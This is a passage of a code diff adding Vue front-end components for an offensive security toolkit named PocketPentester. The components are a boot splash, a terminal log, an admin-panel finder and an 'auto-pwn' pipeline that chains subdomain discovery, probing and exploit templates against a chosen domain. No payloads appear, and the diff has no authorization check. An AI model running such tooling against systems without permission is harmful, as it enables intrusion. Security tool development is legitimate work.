+import { onMounted, onUnmounted, ref } from "vue";
+
+const emit = defineEmits<{ (e: "done"): void }>();
+
+interface BootLine { text: string; ok: boolean; }
+const boot = ref<BootLine[]>([]);
+const progress = ref(0);
+const done = ref(false);
+const fadeOut = ref(false);
+
+const steps: { text: string; delay: number }[] = [
+  { text: "loading kernel modules...",                       delay: 420 },
+  { text: "mounting /data/pentester...",                     delay: 380 },
+  { text: "init: async runtime (tokio rt-multi-thread)",     delay: 360 },
+  { text: "init: rustls tls stack + webpki roots",           delay: 340 },
+  { text: "init: hickory-dns resolver (cloudflare)",         delay: 340 },
+  { text: "recon: port-scan // subdomain // http-probe",     delay: 360 },
+  { text: "exploit: takeover // sqli // xss // jwt",         delay: 360 },
+  { text: "exploit: xploiter engine — 13 bundled templates", delay: 380 },
+  { text: "exploit: auto-pwn pipeline armed",                delay: 340 },
+  { text: "exploit: admin-finder // form-brute // dir-fuzz", delay: 360 },
+  { text: "manual: repeater (burp-lite) ready",              delay: 320 },
+  { text: "wifi: lan-map // mdns // ssdp",                   delay: 320 },
+  { text: "utility: payload-gen 50+ shells loaded",          delay: 320 },
+  { text: "xploiter: compiling regex matchers...",           delay: 300 },
+  { text: "network: dns // ssl-scan // banner-grab",          delay: 320 },
+  { text: "utility: encoder // hash-tools",                   delay: 300 },
+  { text: "arsenal armed. 20 modules online.",                delay: 480 },
+];
+
+let timers: number[] = [];
+
+function push(text: string, ok = true) {
+  boot.value.push({ text, ok });
+  progress.value = Math.min(100, (boot.value.length / steps.length) * 100);
+}
+
+onMounted(() => {
+  let elapsed = 0;
+  steps.forEach((s) => {
+    elapsed += s.delay;
+    timers.push(window.setTimeout(() => push(s.text), elapsed));
+  });
+  timers.push(window.setTimeout(() => {
+    done.value = true;
+  }, elapsed + 300));
+  // hold on "tap to enter" for a while before auto-advancing
+  timers.push(window.setTimeout(() => {
+    fadeOut.value = true;
+  }, elapsed + 4500));
+  timers.push(window.setTimeout(() => {
+    emit("done");
+  }, elapsed + 4900));
+});
+
+function skip() {
+  // finish everything instantly and fade
+  timers.forEach((t) => clearTimeout(t));
+  timers = [];
+  for (const s of steps) {
+    if (!boot.value.find((b) => b.text === s.text)) boot.value.push({ text: s.text, ok: true });
+  }
+  progress.value = 100;
+  done.value = true;
+  fadeOut.value = true;
+  setTimeout(() => emit("done"), 300);
+}
+
+onUnmounted(() => { timers.forEach((t) => clearTimeout(t)); });
+</script>
+
+<template>
+  <div class="splash" :class="{ fade: fadeOut }" @click="skip">
+    <div class="scanlines" />
+    <div class="glitch-line" />
+
+    <div class="frame">
+      <!-- top ASCII frame -->
+      <div class="ascii-top">
+        <span class="corner">┏</span>
+        <span class="line"></span>
+        <span class="tag">[ SYSTEM BOOT ]</span>
+        <span class="line"></span>
+        <span class="corner">┓</span>
+      </div>
+
+      <!-- tegal logo (main brand) -->
+      <div class="brand-row">
+        <img src="/tegalsec.png" alt="Tegal 1337" class="brand-main" />
+      </div>
+
+      <!-- product title -->
+      <div class="product">
+        <div class="product-name">
+          <span class="p-brk">〘</span>
+          <span class="p-main">POCKETPENTESTER</span>
+          <span class="p-brk">〙</span>
+        </div>
+        <div class="product-sub">
+          offensive toolkit <span class="dot-sep">·</span> v0.1.0
+        </div>
+      </div>
+
+      <!-- boot log -->
+      <div class="boot-log">
+        <div class="boot-head">
+          <span class="b-prompt">root@pocket:~$</span>
+          <span class="b-cmd">./init --arm</span>
+          <span class="cursor" v-if="!done">▊</span>
+        </div>
+        <div class="boot-lines">
+          <div v-for="(l, i) in boot" :key="i" class="boot-line">
+            <span class="b-mark" :class="{ ok: l.ok }">{{ l.ok ? "[✓]" : "[x]" }}</span>
+            <span class="b-text">{{ l.text }}</span>
+          </div>
+          <div v-if="!done && boot.length < steps.length" class="boot-line pending">
+            <span class="b-mark">[..]</span>
+            <span class="b-text">{{ steps[boot.length]?.text ?? "" }}<span class="cursor">▊</span></span>
+          </div>
+        </div>
+      </div>
+
+      <!-- progress bar -->
+      <div class="prog">
+        <div class="prog-bar">
+          <div class="prog-fill" :style="{ width: progress + '%' }" />
+        </div>
+        <div class="prog-text">{{ Math.round(progress) }}%</div>
+      </div>
+
+      <!-- created by -->
+      <div class="powered">
+        <span class="pb-label">created by</span>
+        <img src="/imtaqin.png" alt="imtaqin" class="pb-logo pb-imt" />
+      </div>
+
+      <!-- bottom -->
+      <div class="ascii-bottom">
+        <span class="corner">┗</span>
+        <span class="line"></span>
+        <span class="tag" v-if="done">[ tap to enter ]</span>
+        <span class="tag" v-else>[ initializing ]</span>
+        <span class="line"></span>
+        <span class="corner">┛</span>
+      </div>
+    </div>
+  </div>
+</template>
+
+<style scoped>
+.splash {
+  position: fixed;
+  inset: 0;
+  background:
+    radial-gradient(ellipse at top, rgba(255, 47, 74, 0.08), transparent 55%),
+    radial-gradient(ellipse at bottom, rgba(0, 200, 150, 0.03), transparent 60%),
+    var(--bg);
+  display: flex;
+  align-items: center;
+  justify-content: center;
+  z-index: 9999;
+  overflow: hidden;
+  cursor: pointer;
+  transition: opacity 0.4s ease-out;
+  padding: env(safe-area-inset-top) env(safe-area-inset-right) env(safe-area-inset-bottom) env(safe-area-inset-left);
+}
+.splash.fade { opacity: 0; pointer-events: none; }
+
+.scanlines {
+  position: absolute;
+  inset: 0;
+  background: repeating-linear-gradient(
+    0deg,
+    rgba(255, 255, 255, 0.02) 0px,
+    rgba(255, 255, 255, 0.02) 1px,
+    transparent 1px,
+    transparent 3px
+  );
+  pointer-events: none;
+}
+.glitch-line {
+  position: absolute;
+  left: 0;
+  right: 0;
+  height: 2px;
+  background: linear-gradient(90deg, transparent, var(--alert), transparent);
+  opacity: 0.6;
+  animation: glitch 4s linear infinite;
+  pointer-events: none;
+  top: 0;
+}
+@keyframes glitch {
+  0% { top: 0%; opacity: 0; }
+  10% { opacity: 0.6; }
+  50% { top: 100%; opacity: 0.6; }
+  60% { opacity: 0; }
+  100% { top: 100%; opacity: 0; }
+}
+
+.frame {
+  width: min(520px, 95vw);
+  display: flex;
+  flex-direction: column;
+  gap: 14px;
+  padding: 20px 24px;
+  border: 1px solid var(--border-hot);
+  background: rgba(7, 7, 7, 0.85);
+  backdrop-filter: blur(2px);
+  box-shadow: 0 0 60px rgba(255, 47, 74, 0.12);
+  position: relative;
+}
+
+.ascii-top, .ascii-bottom {
+  display: flex;
+  align-items: center;
+  gap: 4px;
+  font-size: 10px;
+  color: var(--fg-dim);
+  letter-spacing: 0.05em;
+}
+.ascii-top .corner, .ascii-bottom .corner { color: var(--alert); font-size: 14px; }
+.ascii-top .line, .ascii-bottom .line {
+  flex: 1;
+  height: 1px;
+  background: linear-gradient(90deg, var(--alert), var(--border-hot));
+  opacity: 0.5;
+}
+.ascii-bottom .line { background: linear-gradient(90deg, var(--border-hot), var(--alert)); }
+.ascii-top .tag, .ascii-bottom .tag {
+  padding: 0 8px;
+  color: var(--alert);
+  font-size: 10px;
+  text-transform: uppercase;
+  letter-spacing: 0.2em;
+}
+
+.brand-row {
+  display: flex;
+  justify-content: center;
+  padding: 4px 0;
+}
+.brand-main {
+  max-width: 180px;
+  width: 60%;
+  height: auto;
+  filter: drop-shadow(0 0 18px rgba(92, 217, 130, 0.35));
+  animation: brand-in 0.7s ease-out;
+}
+@keyframes brand-in {
+  0% { opacity: 0; transform: translateY(-10px); }
+  100% { opacity: 1; transform: translateY(0); }
+}
+
+.product {
+  text-align: center;
+  padding: 4px 0;
+  border-top: 1px dashed var(--border-hot);
+  border-bottom: 1px dashed var(--border-hot);
+}
+.product-name {
+  font-size: 18px;
+  font-weight: 700;
+  letter-spacing: 0.08em;
+  color: var(--fg);
+}
+.product-name .p-brk { color: var(--alert); font-weight: 400; }
+.product-name .p-main { padding: 0 6px; }
+.product-name .p-p { color: var(--alert); }
+.product-sub {
+  font-size: 10px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.15em;
+  margin-top: 4px;
+}
+.product-sub .dot-sep { color: var(--fg-ghost); padding: 0 4px; }
+
+.boot-log {
+  background: var(--bg);
+  border: 1px solid var(--border);
+  padding: 8px 10px;
+  min-height: 130px;
+  font-size: 11px;
+  display: flex;
+  flex-direction: column;
+  gap: 3px;
+}
+.boot-head {
+  display: flex;
+  gap: 4px;
+  border-bottom: 1px solid var(--border);
+  padding-bottom: 4px;
+  margin-bottom: 4px;
+}
+.b-prompt { color: var(--alert); }
+.b-cmd { color: var(--info); }
+.cursor { color: var(--accent); animation: blink 1s steps(2) infinite; display: inline-block; margin-left: 2px; }
+@keyframes blink { 50% { opacity: 0; } }
+
+.boot-lines { display: flex; flex-direction: column; gap: 2px; }
+.boot-line {
+  display: flex;
+  gap: 6px;
+  align-items: baseline;
+  animation: line-in 0.18s ease-out;
+}
+@keyframes line-in {
+  0% { opacity: 0; transform: translateX(-4px); }
+  100% { opacity: 1; transform: translateX(0); }
+}
+.b-mark { color: var(--fg-ghost); flex-shrink: 0; }
+.b-mark.ok { color: var(--valid); }
+.boot-line.pending .b-mark { color: var(--warn); }
+.boot-line.pending .b-text { color: var(--fg-dim); }
+.b-text { color: var(--fg); }
+
+.prog {
+  display: flex;
+  gap: 8px;
+  align-items: center;
+}
+.prog-bar {
+  flex: 1;
+  height: 4px;
+  background: var(--bg);
+  border: 1px solid var(--border);
+  overflow: hidden;
+}
+.prog-fill {
+  height: 100%;
+  background: linear-gradient(90deg, var(--accent-dim), var(--alert));
+  transition: width 0.2s ease-out;
+  box-shadow: 0 0 10px rgba(255, 47, 74, 0.5);
+}
+.prog-text {
+  color: var(--alert);
+  font-size: 10px;
+  font-weight: 700;
+  letter-spacing: 0.1em;
+  font-variant-numeric: tabular-nums;
+  min-width: 34px;
+  text-align: right;
+}
+
+.powered {
+  display: flex;
+  align-items: center;
+  justify-content: center;
+  gap: 8px;
+  padding: 4px 0;
+}
+.pb-label {
+  font-size: 9px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.2em;
+}
+.pb-logo {
+  height: 22px;
+  width: auto;
+  animation: brand-in 0.8s ease-out;
+}
+.pb-imt {
+  filter: drop-shadow(0 0 6px rgba(255, 47, 74, 0.3));
+}
+
+@media (max-width: 420px) {
+  .frame { padding: 14px 16px; gap: 10px; }
+  .brand-main { max-width: 140px; width: 55%; }
+  .pb-logo { height: 18px; }
+  .product-name { font-size: 15px; }
+  .boot-log { min-height: 110px; }
+}
+</style>
diff --git a/src/components/Terminal.vue b/src/components/Terminal.vue
new file mode 100644
index 0000000..eebdd3a
--- /dev/null
+++ b/src/components/Terminal.vue
@@ -0,0 +1,135 @@
+<script setup lang="ts">
+import { nextTick, ref, watch } from "vue";
+import type { LogLine } from "../composables/useTerminal";
+
+const props = defineProps<{ lines: LogLine[]; title?: string }>();
+const emit = defineEmits<{ (e: "clear"): void }>();
+
+const box = ref<HTMLDivElement | null>(null);
+
+watch(
+  () => props.lines.length,
+  async () => {
+    await nextTick();
+    if (box.value) box.value.scrollTop = box.value.scrollHeight;
+  }
+);
+
+function prefix(level: LogLine["level"]) {
+  switch (level) {
+    case "hit": return "[+]";
+    case "valid": return "[✓]";
+    case "ok": return "[*]";
+    case "warn": return "[!]";
+    case "err": return "[x]";
+    case "dim": return "[ ]";
+    default: return "[i]";
+  }
+}
+</script>
+
+<template>
+  <div class="term">
+    <div class="term-head">
+      <span class="term-title">{{ title ?? "output" }}</span>
+      <span class="term-controls">
+        <span class="dot d-red" />
+        <span class="dot d-yellow" />
+        <span class="dot d-live" />
+      </span>
+      <button class="term-clear" @click="emit('clear')">clear</button>
+    </div>
+    <div class="term-body" ref="box">
+      <div v-if="lines.length === 0" class="term-empty">
+        <span class="cursor">▊</span> awaiting input...
+      </div>
+      <div
+        v-for="(l, i) in lines"
+        :key="i"
+        class="term-line"
+        :class="`lvl-${l.level}`"
+      >
+        <span class="ts">{{ l.ts }}</span>
+        <span class="pre">{{ prefix(l.level) }}</span>
+        <span class="msg">{{ l.text }}</span>
+      </div>
+    </div>
+  </div>
+</template>
+
+<style scoped>
+.term {
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  display: flex;
+  flex-direction: column;
+  height: 100%;
+  min-height: 180px;
+}
+.term-head {
+  display: flex;
+  align-items: center;
+  gap: 8px;
+  padding: 4px 8px;
+  border-bottom: 1px solid var(--border);
+  background: var(--bg-elev);
+  font-size: 11px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+}
+.term-title { flex: 1; }
+.term-controls { display: flex; gap: 4px; }
+.dot {
+  width: 8px;
+  height: 8px;
+  border-radius: 0;
+  background: var(--fg-ghost);
+}
+.d-red { background: var(--alert); }
+.d-yellow { background: var(--warn); }
+.d-live { background: var(--accent); }
+.term-clear {
+  color: var(--fg-dim);
+  font-size: 11px;
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  padding: 2px 6px;
+  border: 1px solid var(--border);
+}
+.term-clear:hover {
+  color: var(--accent);
+  border-color: var(--accent);
+}
+.term-body {
+  flex: 1;
+  overflow-y: auto;
+  padding: 8px 10px;
+  font-size: 12px;
+}
+.term-empty {
+  color: var(--fg-ghost);
+  font-style: italic;
+}
+.cursor {
+  color: var(--accent);
+  animation: blink 1s steps(2) infinite;
+}
+@keyframes blink { 50% { opacity: 0; } }
+.term-line {
+  white-space: pre-wrap;
+  word-break: break-all;
+}
+.ts { color: var(--fg-ghost); margin-right: 8px; }
+.pre { margin-right: 6px; }
+.lvl-hit .pre { color: var(--alert); }
+.lvl-hit .msg { color: var(--alert); }
+.lvl-valid .pre { color: var(--valid); }
+.lvl-valid .msg { color: var(--valid); }
+.lvl-ok .pre { color: var(--info); }
+.lvl-ok .msg { color: var(--fg); }
+.lvl-warn .pre, .lvl-warn .msg { color: var(--warn); }
+.lvl-err .pre, .lvl-err .msg { color: var(--alert); }
+.lvl-dim .pre, .lvl-dim .msg { color: var(--fg-dim); }
+.lvl-info .pre { color: var(--fg-dim); }
+</style>
diff --git a/src/components/modules/AdminFinder.vue b/src/components/modules/AdminFinder.vue
new file mode 100644
index 0000000..f9a5ee4
--- /dev/null
+++ b/src/components/modules/AdminFinder.vue
@@ -0,0 +1,135 @@
+<script setup lang="ts">
+import { onMounted, onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import Prompt from "../Prompt.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface AdminHit {
+  url: string;
+  status: number;
+  size: number;
+  title?: string;
+  platform?: string;
+  login_form: boolean;
+  auth_header?: string;
+  redirect?: string;
+}
+
+const baseUrl = ref("https://example.com");
+const useBuiltin = ref(true);
+const extraPaths = ref("");
+const acceptStatusStr = ref("200,301,302,401,403");
+const concurrency = ref(40);
+const timeoutMs = ref(5000);
+const followRedirects = ref(false);
+const running = ref(false);
+const progress = ref({ done: 0, total: 0 });
+const hits = ref<AdminHit[]>([]);
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+const builtinCount = ref(0);
+
+async function loadCount() {
+  try {
+    const list: string[] = await invoke("admin_finder_wordlist");
+    builtinCount.value = list.length;
+  } catch {}
+}
+
+async function run() {
+  if (running.value) return;
+  running.value = true;
+  hits.value = [];
+  progress.value = { done: 0, total: 0 };
+  log.clear();
+
+  const extras = extraPaths.value.split(/[\s\n,]+/).map(s => s.trim()).filter(Boolean);
+  const statuses = acceptStatusStr.value.split(/[,\s]+/).map(s => parseInt(s, 10)).filter(n => !isNaN(n));
+
+  log.info(`target: ${baseUrl.value}`);
+  log.info(`paths: builtin=${useBuiltin.value ? builtinCount.value : 0} + ${extras.length} extra`);
+
+  unlistens.push(await listen<string>("adminfind:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<{ done: number; total: number }>("adminfind:progress", (e) => { progress.value = e.payload; }));
+  unlistens.push(await listen<AdminHit>("adminfind:hit", (e) => {
+    const h = e.payload;
+    hits.value.push(h);
+    const flags: string[] = [];
+    if (h.login_form) flags.push("LOGIN");
+    if (h.auth_header) flags.push("AUTH");
+    if (h.platform) flags.push(h.platform);
+    const flagStr = flags.length ? `[${flags.join("|")}]` : "";
+    const line = `${String(h.status).padEnd(4)} ${h.url} ${flagStr}${h.title ? ` "${h.title.slice(0, 50)}"` : ""}`;
+    if (h.login_form || h.auth_header) log.hit(line);
+    else log.valid(line);
+  }));
+
+  try {
+    await invoke("admin_finder_run", {
+      req: {
+        base_url: baseUrl.value.trim(),
+        extra_paths: extras,
+        use_builtin: useBuiltin.value,
+        accept_status: statuses,
+        concurrency: concurrency.value,
+        timeout_ms: timeoutMs.value,
+        follow_redirects: followRedirects.value,
+      },
+    });
+    const logins = hits.value.filter(h => h.login_form || h.auth_header).length;
+    log.ok(`done: ${hits.value.length} responses, ${logins} login panel(s) found`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+
+onMounted(loadCount);
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <Prompt label="target" v-model="baseUrl" placeholder="https://target.com" />
+
+      <div class="row">
+        <label class="mini wide"><span>status</span><input v-model="acceptStatusStr" placeholder="200,301,302,401,403" /></label>
+      </div>
+
+      <div class="row">
+        <label class="toggle"><input type="checkbox" v-model="useBuiltin" /><span>builtin ({{ builtinCount }})</span></label>
+        <label class="toggle"><input type="checkbox" v-model="followRedirects" /><span>follow</span></label>
+        <label class="mini"><span>conc</span><input v-model.number="concurrency" type="number" min="1" max="200" /></label>
+        <label class="mini"><span>t/out</span><input v-model.number="timeoutMs" type="number" min="500" max="30000" /></label>
+      </div>
+
+      <details class="adv">
+        <summary>extra paths (optional)</summary>
+        <textarea class="term-input" v-model="extraPaths" rows="3" spellcheck="false" placeholder="one path per line, e.g. panel/admin, custom-admin-path" />
+      </details>
+
+      <button class="exec" :disabled="running" @click="run">{{ running ? "[ probing... ]" : "> find admin" }}</button>
+
+      <div v-if="progress.total" class="bar">
+        <div class="bar-fill" :style="{ width: (progress.done / progress.total) * 100 + '%' }" />
+        <span class="bar-text">{{ progress.done }} / {{ progress.total }}</span>
+      </div>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="admin-finder // panel discovery" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.adv { border: 1px solid var(--border); background: var(--bg-panel); padding: 4px 8px; }
+.adv summary { cursor: pointer; font-size: 10px; color: var(--fg-dim); text-transform: uppercase; letter-spacing: 0.1em; padding: 2px 0; }
+.adv summary:hover { color: var(--fg); }
+.adv > *:not(summary) { margin-top: 6px; }
+</style>
diff --git a/src/components/modules/AutoPwn.vue b/src/components/modules/AutoPwn.vue
new file mode 100644
index 0000000..2b5018c
--- /dev/null
+++ b/src/components/modules/AutoPwn.vue
@@ -0,0 +1,364 @@
+<script setup lang="ts">
+import { computed, onMounted, onUnmounted, ref } from "vue";
+import { invoke } from "@tauri-apps/api/core";
+import { listen, type UnlistenFn } from "@tauri-apps/api/event";
+import Terminal from "../Terminal.vue";
+import Prompt from "../Prompt.vue";
+import { useTerminal } from "../../composables/useTerminal";
+
+interface TemplateRef {
+  filename: string;
+  path: string;
+  id: string;
+  name: string;
+  severity: string;
+  tags: string[];
+  builtin: boolean;
+}
+
+interface StageState {
+  status: "idle" | "running" | "done";
+  done: number;
+  total: number;
+  hits: number;
+}
+
+const domain = ref("example.com");
+const usePassive = ref(true);
+const bruteList = ref("www,api,dev,staging,admin,mail,app,portal,vpn,test,beta,m,shop,blog,docs,git,jenkins,jira,grafana,prometheus,sso,auth,login,dashboard,internal");
+const ports = ref("80,443,8080,8443");
+const concurrency = ref(30);
+const timeoutMs = ref(8000);
+
+const templates = ref<TemplateRef[]>([]);
+const selectedTpls = ref<Set<string>>(new Set());
+const sevCritical = ref(true);
+const sevHigh = ref(true);
+const sevMedium = ref(true);
+const sevLow = ref(false);
+const sevInfo = ref(false);
+
+const running = ref(false);
+const recon = ref<StageState>({ status: "idle", done: 0, total: 0, hits: 0 });
+const probe = ref<StageState>({ status: "idle", done: 0, total: 0, hits: 0 });
+const exploit = ref<StageState>({ status: "idle", done: 0, total: 0, hits: 0 });
+const currentStage = ref<string>("");
+
+const foundFindings = ref<any[]>([]);
+const criticalCount = computed(() => foundFindings.value.filter(f => f.severity === "critical").length);
+const highCount = computed(() => foundFindings.value.filter(f => f.severity === "high").length);
+
+const log = useTerminal();
+const unlistens: UnlistenFn[] = [];
+
+const selectedSevs = computed(() => {
+  const out: string[] = [];
+  if (sevCritical.value) out.push("critical");
+  if (sevHigh.value) out.push("high");
+  if (sevMedium.value) out.push("medium");
+  if (sevLow.value) out.push("low");
+  if (sevInfo.value) out.push("info");
+  return out;
+});
+
+async function loadTemplates() {
+  try {
+    await invoke("xploit_store_init");
+    templates.value = await invoke("xploit_store_list", {
+      severity: selectedSevs.value,
+      tag: null,
+      query: null,
+    });
+    // auto-arm all matching templates
+    selectedTpls.value = new Set(templates.value.map(t => t.path));
+  } catch (e: any) {
+    log.err(`template load: ${e}`);
+  }
+}
+
+function reset() {
+  recon.value = { status: "idle", done: 0, total: 0, hits: 0 };
+  probe.value = { status: "idle", done: 0, total: 0, hits: 0 };
+  exploit.value = { status: "idle", done: 0, total: 0, hits: 0 };
+  foundFindings.value = [];
+  currentStage.value = "";
+}
+
+async function go() {
+  if (running.value) return;
+  if (!domain.value.trim()) { log.err("enter a domain"); return; }
+  if (!selectedTpls.value.size) { log.warn("no templates armed — recon + probe only"); }
+
+  running.value = true;
+  reset();
+  log.clear();
+  log.info(`target: ${domain.value}`);
+  log.info(`passive: ${usePassive.value ? "crt.sh" : "off"} | brute: ${bruteList.value.split(",").length} words | templates: ${selectedTpls.value.size}`);
+
+  // collect selected template YAMLs
+  const paths = Array.from(selectedTpls.value);
+  const yamls: string[] = [];
+  for (const p of paths) {
+    try { yamls.push(await invoke<string>("xploit_store_read", { path: p })); }
+    catch { /* skip */ }
+  }
+
+  const brute = bruteList.value.split(/[\s,\n]+/).map(s => s.trim()).filter(Boolean);
+  const probe_ports = ports.value.split(/[\s,]+/).map(s => parseInt(s, 10)).filter(n => !isNaN(n));
+
+  // listeners
+  unlistens.push(await listen<string>("autopwn:stage", (e) => {
+    currentStage.value = String(e.payload);
+    const stage = currentStage.value.split(":")[0];
+    if (stage === "recon") recon.value.status = "running";
+    else if (stage === "probe") probe.value.status = "running";
+    else if (stage === "exploit") exploit.value.status = "running";
+    log.dim(`► stage: ${currentStage.value}`);
+  }));
+  unlistens.push(await listen<string>("autopwn:status", (e) => log.dim(String(e.payload))));
+  unlistens.push(await listen<any>("autopwn:progress", (e) => {
+    const p = e.payload;
+    if (p.stage === "recon") { recon.value.done = p.done; recon.value.total = p.total; }
+    else if (p.stage === "probe") { probe.value.done = p.done; probe.value.total = p.total; }
+    else if (p.stage === "exploit") { exploit.value.done = p.done; exploit.value.total = p.total; }
+  }));
+  unlistens.push(await listen<any>("autopwn:sub", (e) => {
+    recon.value.hits++;
+    const p = e.payload;
+    log.valid(`sub: ${p.host.padEnd(40)} → ${p.ips.join(",")} [${p.source}]`);
+  }));
+  unlistens.push(await listen<any>("autopwn:alive", (e) => {
+    probe.value.hits++;
+    const p = e.payload;
+    log.valid(`alive: ${p.status} ${p.url}${p.title ? ` "${p.title.slice(0, 40)}"` : ""}${p.server ? ` [${p.server}]` : ""}`);
+  }));
+  unlistens.push(await listen<any>("autopwn:xpl:hit", (e) => {
+    exploit.value.hits++;
+    const f = e.payload;
+    foundFindings.value.push(f);
+    const sev = (f.severity || "info").toLowerCase();
+    const extras = [f.cve_id, f.cvss ? `cvss:${f.cvss}` : null].filter(Boolean).join(" ");
+    const msg = `PWN [${sev.toUpperCase()}] ${f.template_id} :: ${f.matched_url} (${f.status})${extras ? ` [${extras}]` : ""}`;
+    if (["critical", "high"].includes(sev)) log.hit(msg);
+    else if (sev === "medium") log.warn(msg);
+    else log.ok(msg);
+  }));
+  unlistens.push(await listen<any>("autopwn:stage-done", (e) => {
+    const p = e.payload;
+    if (p.stage === "recon") recon.value.status = "done";
+    else if (p.stage === "probe") probe.value.status = "done";
+    else if (p.stage === "exploit") exploit.value.status = "done";
+    log.dim(`✓ stage ${p.stage} done: ${p.count}`);
+  }));
+
+  try {
+    const report: any = await invoke("autopwn_run", {
+      req: {
+        domain: domain.value.trim(),
+        use_passive: usePassive.value,
+        brute_wordlist: brute,
+        templates_yaml: yamls,
+        probe_ports: probe_ports.length ? probe_ports : null,
+        concurrency: concurrency.value,
+        timeout_ms: timeoutMs.value,
+      },
+    });
+    log.ok(`pwn complete: ${report.subdomains.length} subs, ${report.alive.length} alive, ${report.findings.length} findings`);
+  } catch (e: any) {
+    log.err(String(e));
+  } finally {
+    running.value = false;
+    cleanup();
+  }
+}
+
+function cleanup() { while (unlistens.length) { const u = unlistens.pop(); if (u) u(); } }
+
+onMounted(loadTemplates);
+onUnmounted(cleanup);
+</script>
+
+<template>
+  <div class="module">
+    <div class="form">
+      <Prompt label="target" v-model="domain" placeholder="example.com (root domain only)" />
+
+      <div class="row">
+        <label class="mini wide"><span>ports</span><input v-model="ports" placeholder="80,443,8080,8443" /></label>
+      </div>
+      <div class="row">
+        <label class="toggle"><input type="checkbox" v-model="usePassive" /><span>passive crt.sh</span></label>
+        <label class="mini"><span>conc</span><input v-model.number="concurrency" type="number" min="1" max="200" /></label>
+      </div>
+      <div class="row">
+        <label class="mini"><span>timeout ms</span><input v-model.number="timeoutMs" type="number" min="1000" max="30000" /></label>
+      </div>
+
+      <details class="adv">
+        <summary>advanced · brute wordlist + template filter</summary>
+        <label class="ta">
+          <span class="lbl">dns brute wordlist</span>
+          <textarea class="term-input" v-model="bruteList" rows="2" spellcheck="false" />
+        </label>
+        <div class="row">
+          <label class="toggle"><input type="checkbox" v-model="sevCritical" @change="loadTemplates" /><span>critical</span></label>
+          <label class="toggle"><input type="checkbox" v-model="sevHigh" @change="loadTemplates" /><span>high</span></label>
+          <label class="toggle"><input type="checkbox" v-model="sevMedium" @change="loadTemplates" /><span>medium</span></label>
+          <label class="toggle"><input type="checkbox" v-model="sevLow" @change="loadTemplates" /><span>low</span></label>
+          <label class="toggle"><input type="checkbox" v-model="sevInfo" @change="loadTemplates" /><span>info</span></label>
+        </div>
+        <div class="tpl-count">
+          {{ selectedTpls.size }} / {{ templates.length }} templates armed
+          <button class="btn-ghost" @click="loadTemplates">reload</button>
+        </div>
+      </details>
+
+      <button class="exec big" :disabled="running" @click="go">
+        {{ running ? "[ pwning... ]" : "► AUTO-PWN" }}
+      </button>
+    </div>
+
+    <!-- stage tracker — compact single row -->
+    <div class="stages-bar">
+      <div class="sb-cell" :class="recon.status">
+        <span class="sb-n">01</span>
+        <span class="sb-name">recon</span>
+        <span class="sb-hits">{{ recon.hits }}</span>
+        <span class="sb-sub">subs</span>
+        <div class="sb-fill" :style="{ width: recon.total ? (recon.done/recon.total)*100+'%' : '0%' }" />
+      </div>
+      <div class="sb-cell" :class="probe.status">
+        <span class="sb-n">02</span>
+        <span class="sb-name">probe</span>
+        <span class="sb-hits">{{ probe.hits }}</span>
+        <span class="sb-sub">alive</span>
+        <div class="sb-fill" :style="{ width: probe.total ? (probe.done/probe.total)*100+'%' : '0%' }" />
+      </div>
+      <div class="sb-cell" :class="exploit.status">
+        <span class="sb-n">03</span>
+        <span class="sb-name">exploit</span>
+        <span class="sb-hits danger">{{ exploit.hits }}</span>
+        <span class="sb-sub">pwn</span>
+        <div class="sb-fill hot" :style="{ width: exploit.total ? (exploit.done/exploit.total)*100+'%' : '0%' }" />
+      </div>
+    </div>
+
+    <!-- finding summary -->
+    <div v-if="foundFindings.length" class="summary">
+      <span class="sum-head">findings</span>
+      <span v-if="criticalCount" class="sev sev-critical">{{ criticalCount }} critical</span>
+      <span v-if="highCount" class="sev sev-high">{{ highCount }} high</span>
+      <span class="sum-total">{{ foundFindings.length }} total</span>
+    </div>
+
+    <Terminal :lines="log.lines.value" title="auto-pwn // pipeline output" @clear="log.clear()" />
+  </div>
+</template>
+
+<style scoped>
+.adv {
+  border: 1px solid var(--border);
+  background: var(--bg-panel);
+  padding: 4px 8px;
+}
+.adv summary {
+  cursor: pointer;
+  font-size: 10px;
+  color: var(--fg-dim);
+  text-transform: uppercase;
+  letter-spacing: 0.1em;
+  padding: 4px 0;
+}
+.adv summary:hover { color: var(--fg); }
+.adv > *:not(summary) { margin-top: 6px; }
+.tpl-count {
+  display: flex;
+  justify-content: space-between;
+  align-items: center;
+  font-size: 11px;
+  color: var(--fg-dim);
+}
+
+.exec.big {
+  flex: 0 0 auto;
+  width: 100%;
+  min-width: 0;
+  height: auto;
+  padding: 8px 12px;
+  font-size: 12px;
+  font-weight: 700;
+  letter-spacing: 0.15em;
+  text-transform: uppercase;
+}
+
+.stages-bar {
+  display: flex;
+  background: var(--bg-panel);
+  border: 1px solid var(--border);
+  flex-shrink: 0;
+}
+.sb-cell {
+  position: relative;
+  flex: 1;
+  display: flex;
+  align-items: center;
+  gap: 5px;
+  padding: 5px 8px;
+  border-right: 1px solid var(--border);
+  font-size: 10px;
+  color: var(--fg-dim);
+  overflow: hidden;
+  text-transform: uppercase;
+  letter-spacing: 0.08em;
+  min-width: 0;
+}
+.sb-cell:last-child { border-right: none; }
+.sb-cell.running { color: var(--fg); }
+.sb-cell.done { color: var(--accent); }
+
+.sb-n { color: var(--fg-ghost); font-size: 9px; flex-shrink: 0; }
+.sb-name { flex: 1; color: inherit; font-weight: 700; overflow: hidden; text-overflow: ellipsis; white-space: nowrap; min-width: 0; }
